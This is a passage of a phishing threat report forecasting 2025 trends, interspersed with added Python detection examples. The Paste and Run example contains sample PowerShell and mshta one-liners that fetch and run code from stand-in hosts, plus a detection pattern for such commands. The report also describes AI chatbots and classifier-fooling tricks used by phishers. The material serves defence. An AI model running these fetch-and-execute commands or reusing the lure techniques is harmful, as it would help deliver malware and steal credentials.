About this report
Despite continued efforts to combat phishing attacks, their numbers keep rising, and the techniques used are becoming increasingly sophisticated and deceptive. In this study, we examined the methods used in phishing attacks, explored the common themes attackers use, and identified the most popular phishing tools in the cybercrime market. Based on trends observed in 2024, we've made predictions about the evolution of phishing attacks in 2025 and provided recommendations to protect against them.
This report contains information on current global cybersecurity threats based on Positive Technologies' own expertise, data from Positive Technologies Expert Security Center (PT ESC) and Threat Intelligence (PT ESC TI), incident investigations, and reputable public sources. Additionally, the research draws on data collected with the PT Knockin email security assessment tool and PT Sandbox.
We estimate that most cyberattacks are not made public due to reputational risks. Consequently, even companies specializing in incident investigation and analysis of hacker activity are unable to quantify the precise number of threats. Our report seeks to draw the attention of companies and individuals to the key motives and methods of cyberattacks, as well as to highlight the main trends in the changing cyberthreat landscape.
This report considers each mass attack (for example, phishing emails sent to multiple addresses) as one attack, not several. For explanations of terms used in this report, please refer to the Positive Technologies glossary.
Summary
- The number of phishing attacks continues to grow: in 2024, the number of incidents increased by 33% compared to 2023 and by 72% compared to 2022.
- Mass phishing attacks are becoming more sophisticated, convincing, and well-prepared, thanks in large part to attackers using artificial intelligence.
- Cybercriminals are increasingly turning to alternative communication channels, such as social media, messaging apps, calls, and SMS. They are also combining these channels into multivector attack strategies.
- Evading security measures will remain a key challenge for attackers. Phishers are expected to increasingly use security mechanisms for malicious purposes.
- In 2025, attackers will continue distributing malicious QR codes. However, these codes will increasingly appear as malicious attachments or links rather than being embedded in email bodies.
- Trusted domains and services will be used more often in phishing attacks to make them appear legitimate.
- Archives and static web pages are expected to remain the most commonly used payloads.
- Attackers will focus on bypassing multifactor authentication (MFA).
- Targeting IT professionals and spreading malware through open-source projects will be a significant trend in 2025.
- Effective protection against phishing attacks requires a comprehensive, systemic approach that combines cybersecurity tools with organizational measures. When used together, these strategies can provide a high level of cybersecurity. Key tools and solutions include secure email gateways (SEGs), email authentication protocols (SPF, DKIM, DMARC), sandboxes, next-generation firewalls (NGFWs), secure web gateways (SWGs), endpoint detection and response (EDR), and link analysis mechanisms. These technologies enable the automatic detection and isolation of threats. At the same time, employee training remains essential for building resilience against phishing. Research shows that after six months of training, 50% of employees can identify a real phishing attack, compared to just 13% without any preparation.
Introduction
Why phishing is still effective
When targeting organizations, cybercriminals are focusing less on complex technical methods and more on exploiting human behavior. To do this, they use social engineering: psychological manipulation techniques designed to trick victims into taking unsafe actions. According to Verizon's Data Breach Investigations Report, 68% of breaches involve a human element, and the median time for a recipient to fall for a phishing email is under 60 seconds.
Even with growing digital literacy and advancements in security technologies, people still fall victim to phishing attacks. This happens because attackers use psychological tricks and take advantage of individual traits. For example, a 2023 research article found that susceptibility to phishing can be predicted by factors such as extraversion, impulsivity, age, quick responses, and levels of openness to experience and conscientiousness.
Even when we know an email might be a phishing attempt, identifying it isn't always easy. A study on the psychology of phishing revealed that none of the participants were able to correctly identify phishing emails 100% of the time, with the average success rate being just 68%.
Interestingly, people are more likely to fall for phishing attempts if they don't encounter them often. To test this, American researchers conducted an experiment where participants received emails with malicious attachments at varying frequencies: 1%, 5%, and 20%. The study was based on the prevalence effect, a psychological phenomenon where people tend to overlook or miss rare signals compared to those they encounter more frequently.
This shows that phishing is a threat we will continue to face. However, that doesn't mean fighting it is pointless—it's possible to significantly reduce the risks associated with these attacks.
Phishing landscape
In 2024, half (50%) of all successful attacks on organizations involved social engineering. The number of such incidents continues to grow: in 2024, they increased by 33% compared to 2023 and by 72% compared to 2022. One common social engineering tactic is phishing, a type of cyberattack in which attackers use various communication channels to steal confidential information or infect victims with malware. According to our incident investigation reports, phishing is the second most popular method for gaining access to corporate infrastructure.
Figure 1. Number of successful social engineering attacks on organizations
Phishing attacks target organizations of all sizes and across all industries. However, in 2024, the most frequently targeted sectors were government agencies (15%), manufacturing companies (10%), and IT firms (9%).
Government agencies have remained high-priority targets for cybercriminals over the past few years. As digitalization accelerates, the volume of data stored and processed by these entities grows, as does the complexity of their systems—making them particularly vulnerable. Cyberattacks are increasingly being used as tools in geopolitical conflicts. These attacks aim not only to steal data but also to destabilize social and economic structures and damage the reputations of government bodies. The attackers are often highly skilled, well-organized criminal groups—advanced persistent threat (APT)1 groups. Over 90% of APT groups use social engineering to gain initial access. In 2024, groups such as Cloud Atlas, Earth Lusca, and Kimsuky employed social engineering. Beyond APT groups, hacktivists2 like Head Mare have also aggressively targeted government agencies. Ransomware groups are another major threat to government organizations. In July 2024, the ransomware group Rhysida gained access to the internal network of the city of Columbus after an employee downloaded a malicious file from a phishing website. The attackers used this foothold to escalate the attack, stealing 3.1 TB of confidential data and demanding $1.7 million in Bitcoin as ransom. When the ransom went unpaid, the criminals published the stolen data.
Manufacturing companies rank second among sectors targeted by phishers,3 accounting for 10% of attacks. This sector is critical to national development, not just financially but also in terms of state interests and intellectual property, such as innovations and proprietary technologies. For example, the threat group Librarian Ghouls conducts industrial espionage against Russian companies, targeting files related to industrial system modeling and development software. Their attacks often involve sending malicious archives containing SCR files disguised as office documents. When executed, these files download additional payloads designed to steal confidential information.
The IT industry, targeted in 9% of phishing attacks, ranked third in 2024, a trend expected to continue into 2025. This sector is strategically important for attackers: beyond financial gains, compromising IT companies allows attackers to use them as springboards for further attacks, such as supply chain attacks or trust-based attacks. These breaches provide access to critical resources, source code, configurations, and automation systems. One notable example from 2024 was a phishing attack on Chrome extension developers. Malicious code was embedded in at least 36 extensions, affecting over 2.6 million users. The injected code stole Facebook account credentials, including those for advertising and business accounts. Business accounts can be used by attackers for a variety of purposes: making direct payments from victims' credit accounts, launching phishing campaigns through the account, or selling access to third parties.
- An APT group (Advanced Persistent Threat) is a highly skilled team of attackers, often sponsored by state actors or other interested parties, with the objective of carrying out prolonged cyberespionage. These cybercriminal groups are highly experienced and use advanced malicious tools as well as previously unknown vulnerabilities.
- Hacktivists are cybercriminals motivated by political or social causes. Their goal is often to disrupt compromised infrastructure, either by encrypting or deleting critical data.
- Phishers are cybercriminals who specialize in phishing attacks.
Figure 2. Categories of victims of successful social engineering attacks by industry (percentage of attacks in 2024)
Phishing attacks on organizations can have a wide range of serious consequences, affecting various aspects.
In 63% of phishing attacks on organizations in 2024, confidential information was stolen. For example, a breach at the medical company Ascension exposed the data of approximately 5.6 million individuals. The stolen information included medical, payment, insurance, and other personal information.
Phishing attacks caused business disruptions in 28% of cases. For instance, in October 2024, IT system failures at Casio delayed product deliveries for a week and temporarily shut down some services. A subsequent investigation by Casio revealed that attackers had used phishing emails with malicious attachments as the initial access vector. Another example is a ransomware phishing attack on Washington County, which brought county and court operations to a halt. The attackers were paid a ransom of $350,000, highlighting how even though direct financial losses account for only 5% of phishing attack consequences, they can still be substantial.
Some incidents resulted exclusively in financial losses, often due to Business Email Compromise (BEC) attacks. For example, the European retail chain Pepco suffered €15 million in losses from such an attack, while the carbon black supplier Orion lost $60 million.
Figure 3. Consequences of phishing attacks for organizations
Trends in phishing attacks
Forecast 1. The line between targeted and mass phishing will continue to blur
Phishing attacks can be broadly divided into two main categories: targeted and mass phishing. Targeted phishing focuses on specific groups of individuals. This type of phishing is highly personalized and carefully crafted, requiring attackers to invest more time and resources; in return, the likelihood of success is significantly higher. Advanced Persistent Threat (APT) groups often employ this method. For example, researchers uncovered a campaign in which the Kimsuky group impersonated a South Korean government official. To execute the attack, the attackers created fake social media accounts to connect with North Korean human rights experts. They then distributed malicious links and documents.
Business email compromise (BEC) is another form of targeted phishing. In these attacks, cybercriminals pose as trusted individuals, such as an executive or a supplier, to trick victims into transferring money or disclosing sensitive corporate information. The rise of BEC has been fueled by the widespread adoption of remote work and digital communication, particularly email, and it is highly lucrative for attackers: according to the Anti-Phishing Working Group, the average amount requested in BEC wire transfer attacks was $84,059 in Q1 2024, rising to $89,520 in Q2 2024.
The majority of phishing attacks, however, fall under the category of mass phishing. This involves attackers sending emails to a large number of recipients, hoping that at least a small percentage will take the desired action. In such attacks, cybercriminals often impersonate well-known brands. For instance, Check Point reports that in Q4 2024, the most frequently impersonated brands in phishing attacks were Microsoft, Apple, and Google. Researchers discovered over 5,000 fake Microsoft notifications that appeared legitimate. These emails had no grammatical errors, and their tone and formatting closely resembled official communications.

Such credibility is becoming increasingly common in mass phishing campaigns, a trend that researchers from Kaspersky Lab have also noted. A key driver is the rapid advancement of technology, particularly AI, which lowers the cost of producing polished, personalized text at scale. We expect the incorporation of elements of targeted phishing into mass campaigns to gain momentum in 2025, so the distinction between mass and targeted phishing will continue to blur: such messages will not only become more prevalent, but their content will also grow more convincing.
Forecast 2. AI will be omnipresent
Artificial intelligence (AI) is becoming deeply embedded in our daily lives, and, like any promising technology, it has attracted the attention of cybercriminals. Social engineering is the area where the use of AI in cyberattacks is most mature, approaching the fourth level of adoption (full attack automation). With AI, attackers can not only generate phishing content but also personalize their attacks, for which they are likely to leverage OSINT4 tools enhanced with AI modules.
Attackers will increasingly use chatbots in phishing attacks. Researchers from F-Secure demonstrated how a chatbot powered by Mistral AI's LLM5 can extract login credentials using the simplest of instructions. Additionally, chatbots have been observed in phishing attacks where they were used to send messages in corporate messengers impersonating company executives. The capabilities of chatbots allow attackers to save time and resources on phishing operations. In the future, cybercriminals are expected to focus on improving chatbots' adaptability: their language and tactics will dynamically adjust based on the victim's responses.
The use of deep voice and deepfake technology also surged in 2024. According to a KPMG report, there was a 245% increase in the use of deepfakes in cyber incidents globally between Q1 2023 and Q1 2024. This trend is expected to continue in 2025. These technologies are particularly effective in targeted phishing and BEC attacks. One of the first notable examples occurred in early 2024, when a Hong Kong firm reported losing $25 million in a deepfake attack. In this incident, the attacker sent a message impersonating the company's CFO based in the United Kingdom. Initially, the employee suspected it was a phishing attempt, as the email mentioned the need for a confidential transaction. However, after a video call, any doubts were dispelled—the individuals on the call looked and sounded exactly like their trusted colleagues.
- Open-source intelligence, information gathering based on publicly available sources.
- LLM: large language model. Mistral AI publishes its models as open-source (open-weight) releases.
Forecast 3. Compromised accounts will be increasingly used in phishing attacks
Targeted phishing often originates from legitimate senders. Cybercriminals exploit the accounts of legitimate users, sometimes those with whom the victim has had prior interactions. This tactic increases the odds of deceiving the victim while also bypassing security measures. In one such case, attackers breached the account of ESET's partner in Israel to send phishing emails. These emails contained a wiper6 disguised as legitimate antivirus software.
In addition to breaching accounts, attackers can exploit victims' ongoing email conversations. A common example is the technique known as email thread hijacking. Cybercriminals gain access to a user's email account, monitor their current conversations, and insert malicious messages into those threads. A similar case was reported by PT ESC TI specialists: the Hive0117 group used a compromised account to reply within an existing legitimate email thread, so the malicious message arrived as a continuation of a conversation the victim already trusted.

Another group, Hive0145, modified this technique further. Instead of simply replying within the thread, they replaced email attachments with malicious payloads while retaining the original file name (but with a different file extension). This way, the group distributed the Strela Stealer malware.
In 2024, attackers were particularly interested in stealing credentials (22%), including those for email accounts. We expect a rise in the use of compromised email accounts in phishing attacks in 2025. These attacks will not only impact targeted organizations but also their clients.
- Malware designed to erase data.
Forecast 4. Attackers will shift to messengers, social networks, and corporate platforms
Phishing can be delivered through various communication channels.
Figure 6. Channels of social engineering used in successful attacks on organizations (percentage of incidents in 2024)
As in previous years, email remains the primary channel of social engineering attacks against organizations. This is mainly because email has long been the key means of communication between employees, partners, and clients.
However, messengers and social networks are emerging as alternatives to email. In 2023 alone, 93% of Russian companies reported using messengers for corporate communication. Attackers are adapting accordingly: the APT group Core Werewolf has begun leveraging Telegram to target the defense industry, while other unidentified attackers have used the Signal messenger to distribute DarkCrystal RAT malware.
Corporate platforms such as Microsoft Teams and Slack are also becoming alternative attack channels. Their popularity has surged in recent years; for instance, Microsoft Teams now boasts approximately 320 million daily active users as of 2024. Cybercriminals are capitalizing on this trend, tailoring their attacks to exploit these platforms. For example, since August 2024, the ransomware group Black Basta has been using Microsoft Teams to contact potential victims.
In 2025, email will remain the primary channel for social engineering attacks. However, attackers will increasingly adapt their phishing tactics to current realities, shifting more attacks to messengers, social networks, and corporate platforms.
Forecast 5. Malvertising will persist
In 2024, websites were used in 23% of phishing attacks, and this number continues to grow. For instance, researchers at BI.ZONE reported a 1.5x increase in the number of malicious websites in 2024 compared to 2023. Furthermore, around 80% of malicious websites now use HTTPS, so a padlock icon in the browser no longer distinguishes a legitimate site from a phishing page.
Previously, we analyzed how malicious websites are often promoted via malvertising. Gen Digital researchers also noted a 17.8% increase in the use of malvertising for desktop devices and a 38.3% increase for mobile devices in Q3 2024. For example, attackers distributed the MadMxShell backdoor under the guise of popular software for IT professionals. Malvertising is expected to remain a persistent trend in 2025.
Forecast 6. Malware infections via open-source projects will continue to increase
Since Q1 2024, there has been a significant rise in the use of package managers like PyPI and npm, as well as platforms like GitHub, in phishing attacks. To spread malware, attackers often employ typosquatting, a technique where a malicious package mimics the name of a legitimate one, capitalizing on developers mistyping a package name. For example, researchers at Socket discovered six malicious npm packages imitating popular developer libraries with tens of millions of downloads. These packages contained a backdoor that allowed attackers to access victims' systems via SSH. As of the publication of Socket's research, these malicious packages had been downloaded over 700 times and were still available in the npm registry.
In 2025, attackers will continue spreading malicious code via package managers, as this remains an effective method for compromising systems. This approach not only targets specific organizations but can also infiltrate the supply chain, impacting partner companies as well.
Forecast 7. Multichannel attacks are expected to become a trend
Another trend expected to gain traction in 2025 is multichannel attacks. This trend began to take shape in 2024. Researchers at Trustwave SpiderLabs observed a 1.4x increase in such campaigns between July and September 2024. Many organizations are implementing robust measures to prevent phishing attacks via email. As a result, attackers are turning to other communication channels that may be less secure. For instance, Zimperium found that cybercriminals increasingly adopt a mobile-first strategy, targeting mobile devices as a major entry point into corporate systems.
Attackers are also integrating vishing (voice phishing) and smishing (SMS phishing) into multichannel campaigns. For example, researchers at GuidePoint Security documented a case where an attacker posed as a support team member or IT employee. The attacker called the victim, claiming to assist with a VPN login issue. After gaining the victim's trust, the attacker sent an SMS containing a link to a fake VPN login page of a targeted organization. Once the victim entered their credentials, they were redirected to the legitimate VPN portal, making the attack nearly undetectable.
Forecast 8. Attackers will not only bypass security measures but exploit them for malicious purposes
In 2025, the primary challenge for attackers in phishing campaigns will be bypassing security measures. They will develop new, sophisticated methods that rely not only on technical expertise but also on exploiting human behavior.
Common email security measures, such as secure email gateways (SEGs), DMARC7 authentication, DKIM signatures,8 and others, are designed to block spam, phishing links, malicious attachments, and other email-borne threats. However, attackers are increasingly finding ways past these defenses. Between January and March 2024, the number of attacks evading SEG detection rose by 52.2%, and 68.4% of those messages passed authentication checks such as DMARC. One common reason is the use of compromised accounts, as discussed above: mail sent from a legitimate mailbox is genuinely authenticated for that domain, so SPF, DKIM, and DMARC have nothing to reject.
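Why a message from a compromised partner mailbox passes the checks described above while a look-alike domain fails them, as an added example (not code from the report): DMARC verifies only that a domain authenticated by SPF or DKIM aligns with the visible From domain, then applies the policy the sender published in DNS. The Authentication-Results header values and DMARC records are constructed, and alignment uses a simplified organisational-domain rule (last two labels) instead of the Public Suffix List.

```python
import re


def parse_auth_results(header):
    """Parse an Authentication-Results value into {method: (result, domain)}."""
    results = {}
    for clause in header.split(";")[1:]:  # clause 0 is the authserv-id
        m = re.match(r"\s*(spf|dkim)=(\w+)", clause)
        if not m:
            continue
        method, result = m.groups()
        # smtp.mailfrom may be an address or a domain; header.d is always a domain
        dom = re.search(r"(?:smtp\.mailfrom|header\.d)=(?:[^@\s]+@)?([\w.-]+)", clause)
        results[method] = (result.lower(), dom.group(1).lower() if dom else None)
    return results


def org_domain(domain):
    """Simplified organisational domain: last two labels (real DMARC uses the PSL)."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def dmarc_alignment(auth_header, from_domain):
    """Relaxed alignment: a passing SPF or DKIM domain must share the From org domain."""
    results = parse_auth_results(auth_header)
    aligned = [m for m, (res, dom) in results.items()
               if res == "pass" and dom and org_domain(dom) == org_domain(from_domain)]
    return ("pass" if aligned else "fail"), sorted(aligned)


def parse_dmarc_record(txt):
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def receiver_action(verdict, dmarc_txt):
    """What a receiving MTA does with the message under the sender's published policy."""
    tags = parse_dmarc_record(dmarc_txt)
    if verdict == "pass" or tags.get("v") != "DMARC1":
        return "deliver"
    return {"reject": "reject", "quarantine": "quarantine"}.get(tags.get("p", "none"), "deliver")


def dmarc_record_findings(txt):
    """Weak-policy audit of a DMARC TXT record."""
    t = parse_dmarc_record(txt)
    if t.get("v") != "DMARC1":
        return ["not a DMARC record"]
    findings = []
    if t.get("p", "none") == "none":
        findings.append("p=none: failures are reported but still delivered")
    if int(t.get("pct", "100")) < 100:
        findings.append(f"pct={t['pct']}: policy applied to only part of failing mail")
    if "rua" not in t:
        findings.append("no rua= address: no aggregate reports, so spoofing goes unnoticed")
    return findings


# Constructed headers. Case 1: mail really sent from a compromised partner mailbox.
COMPROMISED = ("mx.victim.example; spf=pass smtp.mailfrom=bounce@partner.example; "
               "dkim=pass header.d=partner.example")
# Case 2: attacker infrastructure on a look-alike domain, From: forged as partner.example.
LOOKALIKE = ("mx.victim.example; spf=pass smtp.mailfrom=news@partner-example.com; "
             "dkim=pass header.d=partner-example.com")

if __name__ == "__main__":
    print(dmarc_alignment(COMPROMISED, "partner.example"))   # ('pass', ['dkim', 'spf'])
    print(dmarc_alignment(LOOKALIKE, "partner.example"))     # ('fail', [])
    print(receiver_action("fail", "v=DMARC1; p=none"))       # deliver
```

The compromised mailbox passes because SPF and DKIM are both valid for partner.example and that is exactly the From domain; no authentication protocol can object. The look-alike fails alignment, but whether that failure means anything depends on the victim domain's own policy: with p=none the message is delivered anyway, which is why the record audit matters.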
Attackers are also using numerous other techniques. For instance, they have started using Blob URLs. A blob: URL refers to data held in the browser's memory, typically assembled by script from content carried in the message or attachment itself, so the phishing page is never fetched from an external address. Traditional URL filtering and scanning tools, which examine remote links, have nothing to look up, which makes such pages harder to block.
What is particularly alarming is that attackers are exploiting security mechanisms themselves for malicious purposes. For example, URL rewriting, a security technique for checking links in emails, is now being turned against the users it protects. It works by replacing each link with one that first sends the user to a security server, which analyzes the original destination: if it is deemed safe, the user is forwarded to the target site; otherwise, access is blocked. Attackers have studied how this works and now exploit it, since a rewritten link carries the security vendor's trusted domain and inherits its reputation with both users and filters.
AI- and machine learning-based security platforms take a different approach: rather than matching "known bad" signatures as traditional tools do, they detect anomalies as deviations from "known good"9 behavior. However, even these systems are being targeted. Researchers at SlashNext discovered a method where attackers craft emails with two separate sections: a visible portion prompting the recipient to click a link or provide information, and a hidden portion filled with harmless text meant to deceive AI/ML classifiers by simulating "legitimate" communication. Attackers rely on two assumptions: that users won't scroll down to the content intended to fool the model, and that the classifier weighs the whole body rather than only what is rendered.
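The two-section email can be caught by comparing what the client renders with what is in the markup. The following added example (not code from the report or from SlashNext) splits an HTML body into visible and hidden text using only the standard library. The sample message is constructed, and the CSS patterns treated as "hidden", including white text on the assumption of a white background, are our choices.

```python
import re
from html.parser import HTMLParser

# CSS that removes text from the rendered view. 'color: white' is treated as hidden on
# the assumption (ours) that the client renders the message on a white background.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?![.\d])"
    r"|opacity\s*:\s*0(?![.\d])|(?<![-\w])color\s*:\s*(?:#fff(?:fff)?|white)\b",
    re.I,
)
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "wbr"}


class SplitTextExtractor(HTMLParser):
    """Collect text into 'visible' and 'hidden' buckets, honouring element nesting."""

    def __init__(self):
        super().__init__()
        self.visible, self.hidden = [], []
        self._stack = []  # one entry per open element: "visible", "hidden" or "skip"

    def _state(self):
        return self._stack[-1] if self._stack else "visible"

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return  # no content and no closing tag, so nothing to push
        a = dict(attrs)
        parent = self._state()
        if parent == "skip" or tag in ("script", "style", "head", "title"):
            state = "skip"  # never rendered as body text
        elif parent == "hidden" or "hidden" in a or HIDDEN_CSS.search(a.get("style") or ""):
            state = "hidden"
        else:
            state = "visible"
        self._stack.append(state)

    def handle_startendtag(self, tag, attrs):
        pass  # <br/>, <img/> and friends carry no text

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self._stack:
            self._stack.pop()

    def handle_data(self, data):
        text = " ".join(data.split())
        if text and self._state() != "skip":
            (self.hidden if self._state() == "hidden" else self.visible).append(text)


def split_text(html):
    """Return the rendered text, the hidden text and the share of text that is hidden."""
    p = SplitTextExtractor()
    p.feed(html)
    p.close()
    visible, hidden = " ".join(p.visible), " ".join(p.hidden)
    total = len(visible) + len(hidden)
    return {"visible": visible, "hidden": hidden,
            "hidden_ratio": round(len(hidden) / total, 2) if total else 0.0}


def looks_like_split_lure(html, ratio=0.5, min_hidden_chars=200):
    """Flag bodies where most of the text is invisible padding."""
    r = split_text(html)
    return r["hidden_ratio"] >= ratio and len(r["hidden"]) >= min_hidden_chars


# Constructed sample, not a real campaign message.
SAMPLE_LURE = """<html><body>
<p>Your mailbox password expires today. <a href="https://example.invalid/reset">Verify your account</a> to avoid interruption.</p>
<div style="display:none">
<p>Dear colleagues, please find attached the agenda for the quarterly planning meeting.
As discussed, the finance team will present the budget review and the facilities team
will cover the office relocation timeline. Regards, Internal Communications</p>
</div>
<p style="font-size:0;color:#ffffff">Thank you for your continued support of our community outreach programme.</p>
</body></html>"""

BENIGN = "<html><body><p>Hello team, lunch is at noon in the main canteen.</p></body></html>"

if __name__ == "__main__":
    print(split_text(SAMPLE_LURE))
    print(looks_like_split_lure(SAMPLE_LURE), looks_like_split_lure(BENIGN))
```

Scoring the visible and hidden parts separately is the practical point: a classifier fed only the rendered text sees the password lure, while the filler intended to look legitimate is reported as a separate, suspicious feature instead of diluting the verdict.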


Additionally, attackers evade detection using various types of malicious payloads, which we will discuss later.
Websites are also being targeted with techniques to evade automated security checks. For instance, attackers have started embedding CAPTCHA tests on malicious pages to block automated scanning. CAPTCHAs not only hinder detection but also create an illusion of legitimacy for victims, as they are commonly associated with legitimate websites. This technique has been observed in campaigns like Uncle Scam, as well as attacks by groups like Tycoon and Storm-1575 targeting U.S. schools. Additionally, anti-bot services available on darknet marketplaces enable attackers to bypass automated protections.
Finally, attackers are adopting social engineering techniques aimed at human vulnerabilities. A notable example from 2024 is the Paste and Run method, which tricked users into copying, pasting, and running malicious code on their devices. Victims received files that displayed an error message upon opening, prompting them to execute a set of commands to "fix" the issue. Hornetsecurity reported a campaign where 105,640 phishing emails using this technique were sent from 17 attacker-controlled domains. In similar cases, fake CAPTCHAs were used as bait—a trend highlighted in Q4 2024.
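An added detection example for Paste and Run (not from the report or from Hornetsecurity): because the victim types or pastes the command into the Windows Run dialog, the first malicious process is a script host whose parent is explorer.exe and whose command line fetches remote content. The event lines are constructed in a simplified tab-separated key=value form rather than a real Sysmon schema, and the parent/child assumption is ours; a victim who pastes into an already-open terminal would show that terminal as the parent instead.

```python
import re

# Interpreters and downloaders the pasted one-liners typically start.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe"}
# Assumption: the Win+R Run dialog launches its child under explorer.exe.
USER_SHELLS = {"explorer.exe"}
# Command-line fragments that fetch or decode remote content.
SUSPICIOUS = re.compile(
    r"https?://|\\\\[\w.-]+\\|\biex\b|invoke-expression|invoke-webrequest|\biwr\b|"
    r"downloadstring|frombase64string|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"-w(?:indowstyle)?\s+hidden|\bmshta\s+\S+",
    re.I,
)


def parse_event(line):
    """'Key=Value<TAB>Key=Value' -> dict (constructed format, not Sysmon)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("\t") if "=" in kv)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'paste-and-run' when a user shell spawns a script host with a fetching command line."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if image in SCRIPT_HOSTS and parent in USER_SHELLS and SUSPICIOUS.search(cmd):
        return "paste-and-run"
    return None


def hunt(lines):
    """Return (time, image, command line) for every matching event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if classify(ev):
            hits.append((ev["EventTime"], basename(ev["Image"]), ev["CommandLine"]))
    return hits


# Constructed process-creation events: two lure executions, two legitimate admin actions.
SAMPLE_EVENTS = [
    "EventTime=2024-11-05T09:14:02\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -c \"iwr http://cdn.example.invalid/verify.txt | iex\"",
    "EventTime=2024-11-05T09:20:41\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta https://captcha.example.invalid/human-check",
    "EventTime=2024-11-05T10:01:13\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -NoProfile -File C:\\Tools\\backup.ps1",
    "EventTime=2024-11-05T10:05:59\tParentImage=C:\\Program Files\\Git\\git-bash.exe"
    "\tImage=C:\\Windows\\System32\\curl.exe"
    "\tCommandLine=curl https://repo.example.invalid/pkg.tgz -o pkg.tgz",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

The third and fourth events show why each condition is needed: an administrator running a local script from the Run dialog has the right parent but no fetching command line, and a developer's curl has a URL but a terminal parent. Tuning in a real environment means adding the organization's own management tools to the allowlist rather than loosening the pattern.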

- Domain-based Message Authentication, Reporting and Conformance (DMARC) is an email authentication protocol designed to combat spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM: the domain owner publishes a DNS policy stating what receivers should do with messages that fail SPF or DKIM alignment, and where to send reports.
- DomainKeys Identified Mail (DKIM) adds a cryptographic signature to messages, allowing receivers to verify that the signing domain authorized the message and that the signed headers and body were not altered in transit.
- "Known good" is an approach based on expected user behavior. Any deviation from the norm in this approach is treated as a potential threat.
Forecast 9. Malicious QR codes will continue to pose a threat
Attackers use attachments, links, and QR codes to distribute malware and harvest credentials and other data. Attachments and links are the most common methods, while QR codes are used less frequently. Despite their rarity, they remain a significant threat: according to Cisco Talos, while QR codes appear in only about one out of every 500 emails, 60% of those are spam or malicious.
Attackers often combine these methods. For example, Positive Technologies found QR codes embedded in 9% of malicious attachments, 2.5 times as often as QR codes placed directly in the email body. Embedding QR codes in documents makes it harder for security tools to analyze and block these emails before they reach employees. This attack vector also typically spans two devices: the employee receives the phishing email on a corporate workstation but scans the QR code with a personal mobile phone, which may lack the protection and URL filtering of corporate systems.
To evade detection, attackers have started rendering QR codes out of ASCII and Unicode10 characters (for example, block-drawing glyphs) instead of embedding an image. Image-based defenses that locate a QR code in a picture, decode it, and check the resulting URL see only text and extract nothing. Campaigns using these techniques have been analyzed by SlashNext and Barracuda.
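An added example (not from the report, SlashNext, or Barracuda) of a check that catches text-rendered QR codes: instead of looking for an image, it looks for a square block of block-drawing or ASCII glyphs in the message body. The grid it builds for testing is a constructed pattern with the shape of a QR code, not a decodable one.

```python
# Glyphs used to draw "dark" modules: full and half blocks, shade blocks, and the
# ASCII characters seen in the plain-text variant.
BLOCK_GLYPHS = set("█▀▄▌▐■▓▒░#@")
# "Light" modules: ordinary and non-breaking spaces.
BLANK_GLYPHS = set(" \u00a0\u2003\u3000")


def constructed_block_qr(size=21):
    """A 21x21 square of full-block glyphs. Constructed filler pattern, NOT a real QR code."""
    rows = []
    for y in range(size):
        rows.append("".join("█" if (x * x + x * y + y * y) % 3 == 0 else " "
                            for x in range(size)))
    return "\n".join(rows)


def _is_grid_line(line, min_width=9, density=0.9):
    """A line that is almost entirely block/blank glyphs and has at least one dark module."""
    if len(line) < min_width:
        return False
    glyph = sum(c in BLOCK_GLYPHS for c in line)
    blank = sum(c in BLANK_GLYPHS for c in line)
    return glyph > 0 and (glyph + blank) / len(line) >= density


def find_text_qr_grids(body, min_rows=9):
    """Return every run of consecutive grid lines that forms a square-ish block."""
    lines = body.splitlines()
    grids, i = [], 0
    while i < len(lines):
        if not _is_grid_line(lines[i]):
            i += 1
            continue
        j = i
        while j < len(lines) and _is_grid_line(lines[j]):
            j += 1
        block = lines[i:j]
        widths = [len(l) for l in block]
        # Half-block glyphs pack two module rows per text line, so a 21-module code
        # can be as short as 11 lines; min_rows is set below that.
        if len(block) >= min_rows and max(widths) - min(widths) <= 2:
            grids.append({"start_line": i + 1, "rows": len(block), "cols": max(widths),
                          "half_block": any(c in "▀▄" for l in block for c in l)})
        i = j
    return grids


# Constructed message body with the grid in place of an image.
SAMPLE_BODY = (
    "Subject: Action required: review your shared document\n\n"
    "Hello,\n\n"
    "Scan the code below with your phone to open the document.\n\n"
    + constructed_block_qr() +
    "\n\nThis link expires in 24 hours.\n"
)

if __name__ == "__main__":
    print(find_text_qr_grids(SAMPLE_BODY))
    print(find_text_qr_grids(SAMPLE_BODY.replace("█", "#")))  # ASCII variant
```

The detector reports the grid's position and size, which is enough to route the message to a renderer that screenshots the body and runs a real QR decoder over the image, the step the attacker was trying to avoid by not sending one.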

In the near future, phishing attacks involving QR codes will become an even greater threat. In 2025, we expect to see the emergence of new techniques, similar to ASCII and Unicode QR codes, that will further mask these threats from security tools. Malicious payloads, including QR codes, will increasingly migrate to attachments or links, avoiding email bodies.
- Character encoding standards. ASCII is used to represent characters in English, while Unicode can represent characters from almost all written languages worldwide.
Forecast 10. Archives and static web pages will be the most popular attachment types
Figure 11. Most common types of malicious payloads (percentage of incidents in 2024)
The use of different types of malicious attachments changed compared to the previous period. Attackers' strategies are often driven by their ability to bypass security measures.
